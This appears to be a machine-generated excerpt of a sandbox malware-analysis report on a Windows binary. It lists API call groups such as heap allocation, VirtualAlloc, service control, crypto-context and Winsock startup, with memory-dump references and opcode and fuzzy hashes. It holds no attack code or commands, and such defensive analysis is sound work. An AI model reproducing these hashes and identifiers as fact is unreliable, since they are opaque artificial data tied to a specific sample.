                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateCreateDestroyVersion
                                                                • String ID:
                                                                • API String ID: 760317429-0
                                                                • Opcode ID: f37498ba757216f82bb105e0301ea33d25a41814505da7b59bdbe9bd2d794452
                                                                • Instruction ID: ff8cbbb7c7025ce975ce3e0d66b7e0a0ed3ddf66254f0808e1d380523409e837
                                                                • Opcode Fuzzy Hash: f37498ba757216f82bb105e0301ea33d25a41814505da7b59bdbe9bd2d794452
                                                                • Instruction Fuzzy Hash: 27F09B70658301BADB307B766E657373696D740B55F10843BF401CD3A0EF68C5C1961A
                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,004D16FF,00000001,?,?,00000006,?,00462F85,00000000,00000000,00000000), ref: 004D3C2F
                                                                  • Part of subcall function 004D3AD6: GetVersionExA.KERNEL32 ref: 004D3AF5
                                                                • HeapDestroy.KERNEL32(?,?,00000006,?,00462F85,00000000,00000000,00000000), ref: 004D3C6E
                                                                  • Part of subcall function 004D3EAF: RtlAllocateHeap.NTDLL(00000000,00000140,004D3C57), ref: 004D3EBC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateCreateDestroyVersion
                                                                • String ID:
                                                                • API String ID: 760317429-0
                                                                • Opcode ID: ed6dea93d085b8c51aef8621c4c264e54b1b399aca116a1a5bc58684496e68e3
                                                                • Instruction ID: 3f8a39afa2949e5887ed9ba1476d043a838b518f1432fe2233b5bc082f38935c
                                                                • Opcode Fuzzy Hash: ed6dea93d085b8c51aef8621c4c264e54b1b399aca116a1a5bc58684496e68e3
                                                                • Instruction Fuzzy Hash: 18F02B727643015ADF606F319D657373681A751B43F14147BF801D83F0EBA896819A1B
                                                                APIs
                                                                • IsBadReadPtr.KERNEL32(00000000,00000008), ref: 00429F2E
                                                                • RtlFreeHeap.NTDLL(00890000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00429F40
                                                                  • Part of subcall function 00429CE0: GetModuleHandleA.KERNEL32(00000000,00429F86,?,?,?,0041C69B,00000004,00000000,0041C67E,00000000,004EE32A,00000000,00000000,000000FF,?), ref: 00429CEA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHandleHeapModuleRead
                                                                • String ID:
                                                                • API String ID: 627478288-0
                                                                • Opcode ID: 91b97a74fc8769d31267806e5bfbec472b0aa46679cc5094d22786670b564bc1
                                                                • Instruction ID: 614edf61bee2760fde758ee60a613caaf31da13a55459759961ba3211f077b67
                                                                • Opcode Fuzzy Hash: 91b97a74fc8769d31267806e5bfbec472b0aa46679cc5094d22786670b564bc1
                                                                • Instruction Fuzzy Hash: 9BE06D30F04531979B60BB2AFD84A9B339AAB02391F521067F545D3250D2286C408BB8
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000), ref: 004DC583
                                                                  • Part of subcall function 004E06DB: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004E0718
                                                                  • Part of subcall function 004E06DB: RtlEnterCriticalSection.NTDLL(004DE2E0), ref: 004E0733
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                • String ID:
                                                                • API String ID: 1616793339-0
                                                                • Opcode ID: df58770f71e4f909450a2131a19038da05a12c618640a8083dcc632225e79234
                                                                • Instruction ID: 549bae5cd182ff61da08bc7b16d73df75aa9e233850fe81fc9d92b245d71bdaf
                                                                • Opcode Fuzzy Hash: df58770f71e4f909450a2131a19038da05a12c618640a8083dcc632225e79234
                                                                • Instruction Fuzzy Hash: F221D871A40615BBDB10EB65ECA179EB7A4EB01B64F104617F420EB3C0C778B942DA59
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 004D1A97
                                                                  • Part of subcall function 004D5158: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004D5195
                                                                  • Part of subcall function 004D5158: RtlEnterCriticalSection.NTDLL(00000010), ref: 004D51B0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                • String ID:
                                                                • API String ID: 1616793339-0
                                                                • Opcode ID: 76ae98cf4207e21c577eb17bb89ad067559ebf69a1b6b1f3b5cdb7821c2d4fb1
                                                                • Instruction ID: 6e0a882ebd3f2de25bda8b1d6f1a11e1b043b656730406b184eb11c9be2acf16
                                                                • Opcode Fuzzy Hash: 76ae98cf4207e21c577eb17bb89ad067559ebf69a1b6b1f3b5cdb7821c2d4fb1
                                                                • Instruction Fuzzy Hash: D8210831A41205BBDB10EFA5DC52B9E77A4EB01764F24011BF820EB3E0C77CAD818B98
                                                                APIs
                                                                • LCMapStringA.KERNEL32(00000804,00400000,?,00000000,00000000,00000001), ref: 0043148F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: String
                                                                • String ID:
                                                                • API String ID: 2568140703-0
                                                                • Opcode ID: 4a55086bac393db21a11975f5aa8e2df1c0a5a33614d121d4fecc83aeed80e2f
                                                                • Instruction ID: 60155b1ab0fd761279dd9be98437ebece07d31d22520370c3b0c1c7f9008aac2
                                                                • Opcode Fuzzy Hash: 4a55086bac393db21a11975f5aa8e2df1c0a5a33614d121d4fecc83aeed80e2f
                                                                • Instruction Fuzzy Hash: F511C6B26443143BE21066259C42FBB369CDFCA7ACF14151FF90456242EA6DEA0142EE
                                                                APIs
                                                                • SetCurrentDirectoryA.KERNEL32(00000000,004835B0,00000001,00000000,00000000,80000004), ref: 004CEB95
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentDirectory
                                                                • String ID:
                                                                • API String ID: 1611563598-0
                                                                • Opcode ID: e0760899269c912ab9aadc58472be296380ceadd4e11526be30b7279be39a6c6
                                                                • Instruction ID: 47982069c236c6bb95660f857ea9db8b43855cf3f0976acba5e2a23cd31dae55
                                                                • Opcode Fuzzy Hash: e0760899269c912ab9aadc58472be296380ceadd4e11526be30b7279be39a6c6
                                                                • Instruction Fuzzy Hash: 66A002B5A08245ABCE01DBA9DA8C84A7FACAB85351B004894B149C6063C674D842CB16
                                                                APIs
                                                                • PathFileExistsA.SHLWAPI(00000000,0043FC67,00000001,?,00000000,80000004), ref: 004CB6B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID:
                                                                • API String ID: 1174141254-0
                                                                • Opcode ID: b9108c279c0c020b552fc9cf0ef5d346b175744142dfe5c609a52657af39d45c
                                                                • Instruction ID: 73bd5e010877d21f3008d315d7309d94801259343814b74229c968ee39962f68
                                                                • Opcode Fuzzy Hash: b9108c279c0c020b552fc9cf0ef5d346b175744142dfe5c609a52657af39d45c
                                                                • Instruction Fuzzy Hash: 52A00275919341BFCE00DBA4E98C84A7BA8BB84351B504868B189C7421E634D440CB15
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,0047E8E5,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0047EB17
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 6a5c688f70d79bc2af88556774f0c9cdf0549ee203fca10f56ab3ff5853e4b7b
                                                                • Instruction ID: 22da00314316e72c7dcaf330da79d6bfc010a23951a9ab1f7251b8bff67d5928
                                                                • Opcode Fuzzy Hash: 6a5c688f70d79bc2af88556774f0c9cdf0549ee203fca10f56ab3ff5853e4b7b
                                                                • Instruction Fuzzy Hash: 75D0C970248342ABEF26CE628C09F1BBEA9BF84B00F004C0CB3A5B41D0C375E0189A0A
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000), ref: 004B6720
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B67DC
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B690E
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000002), ref: 004B694E
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6A34
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6A74
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6B5A
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6B9A
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6C80
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6CC0
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6DA6
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6DE6
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6ECC
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6F0C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove$lstrlen
                                                                • String ID: "$\
                                                                • API String ID: 3143474183-1472051173
                                                                • Opcode ID: c5af64b26b2291506de865b9503f136e2cd275813bc9c25ea2ea9152010738b9
                                                                • Instruction ID: 5f332537a11c89a699be5e722cc7ad0cc1a02a3468edbf2174cd1c10692aaaba
                                                                • Opcode Fuzzy Hash: c5af64b26b2291506de865b9503f136e2cd275813bc9c25ea2ea9152010738b9
                                                                • Instruction Fuzzy Hash: 72420870D0461CEBDF00AF92E889AEEBF74FF48314F16145AE04176195CB794975CB2A
                                                                APIs
                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,?), ref: 00426B7F
                                                                • OpenServiceA.ADVAPI32(00000000,00000000,?), ref: 00426C4B
                                                                • ControlService.ADVAPI32(00000000,00000004,00426584), ref: 00426C8C
                                                                • ControlService.ADVAPI32(00000000,00000001,00426584), ref: 00426CE2
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426D1B
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426D47
                                                                • ControlService.ADVAPI32(00000000,00000004,00426584,00000000), ref: 00426D9C
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426DD5
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426E01
                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000), ref: 00426E94
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426EC0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Control$Open$Manager
                                                                • String ID:
                                                                • API String ID: 1876490491-0
                                                                • Opcode ID: 1755296f8fc54cf54e599685dc0260275dc26e8e0e1ccef6e1c89ba21033de50
                                                                • Instruction ID: cb4cfcf12ec3748afaf6fe6fe20870313ae5e7475056768f32ffedc90ed4faed
                                                                • Opcode Fuzzy Hash: 1755296f8fc54cf54e599685dc0260275dc26e8e0e1ccef6e1c89ba21033de50
                                                                • Instruction Fuzzy Hash: CCE15E70F81319BBEB109F81ED87BBEB631EB06711F601066F7043E1D1D6B65A508A9E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d1a4f1cca5669f914b4b9a93ac4b89997ffeab7cba7c63631a9e07527697da6b
                                                                • Instruction ID: fc4168784fd8f757b4b04a549f650068bb1707f5b9fe4a3474148942801cb55f
                                                                • Opcode Fuzzy Hash: d1a4f1cca5669f914b4b9a93ac4b89997ffeab7cba7c63631a9e07527697da6b
                                                                • Instruction Fuzzy Hash: BED19E70F41315BBEB109F81ED43BBEB631EB06715F601026F6053E2D1D6BA5A508BAE
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,004EE2EC,004EE2EC,00000001,F0000000), ref: 00414626
                                                                • CryptAcquireContextA.ADVAPI32(00000000,004EE2EC,004EE2EC,00000001,00000000), ref: 00414674
                                                                • CryptCreateHash.ADVAPI32(00000000,00000000,00000000,00000000,00000000), ref: 004146C6
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00414704
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Crypt$Context$Acquire$CreateHashRelease
                                                                • String ID: 0123456789ABCDEF
                                                                • API String ID: 3535039526-2554083253
                                                                • Opcode ID: f9eac58559a44d84fa9b87f84b6a0f7e67f6b8d043bd9254509847c5fd200987
                                                                • Instruction ID: 891ec6b27578ed4031a72fea8fe2fd55bdf83367041d31bd596637aefe0faade
                                                                • Opcode Fuzzy Hash: f9eac58559a44d84fa9b87f84b6a0f7e67f6b8d043bd9254509847c5fd200987
                                                                • Instruction Fuzzy Hash: DD128FB0E40358BBDB00AF91EC83BEEBB74BB55714F14002AF6087A292D77959548B9D
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 0046AC59
                                                                  • Part of subcall function 004CC470: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004CC48A
